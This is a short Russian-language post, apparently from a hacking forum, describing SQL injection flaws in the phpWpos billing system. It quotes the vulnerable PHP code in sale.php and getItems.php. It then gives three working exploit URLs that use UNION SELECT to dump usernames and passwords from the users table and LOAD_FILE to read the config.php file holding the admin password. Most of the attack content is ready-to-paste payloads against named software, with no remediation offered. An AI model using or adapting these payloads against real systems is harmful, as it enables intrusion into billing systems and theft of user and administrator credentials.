{Некоторые уязвимости в биллинг системе phpWpos}

Офиц. сайт: http://phpwpos.sourceforge.net/


1)Sql inj в скрипте sale.php

<?php
$sql = "select date, sale_sub_total, sale_total_cost from sales where id=" .$_GET['id'];
$result = $db->query($sql);
$sales_info = mysql_fetch_row($result);
?>

Эксплойт
http://localhost/wostest/sale.php?id=2+union+select+concat(password,0x3a,us ername),2,3+from+users/*

2)Sql inj в скрипте getItems.php
$db = new database($dbhost,$dbuser,$dbpassword,$dbname);
$result = $db->query("select id, item_name, image, buy_price, unit_price, tax_percent, total_cost from items where category_id=" .$_GET['category']);

Эксплойт:
http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a3a3a,id ,first_name,last_name,username,password,type)+from +users/*

{Трабла}
Парль администратора в БД не содержится, он прописан в конфиге. Для эксплуатации уязвимости требуется: file_priv = Y

Эксплойт
http://localhost/wostest/getItems.php?category=-1+union+select+1,2,3,4,5,6,LOAD_FILE('\path\site\c onfig.php')/*

Статья супер!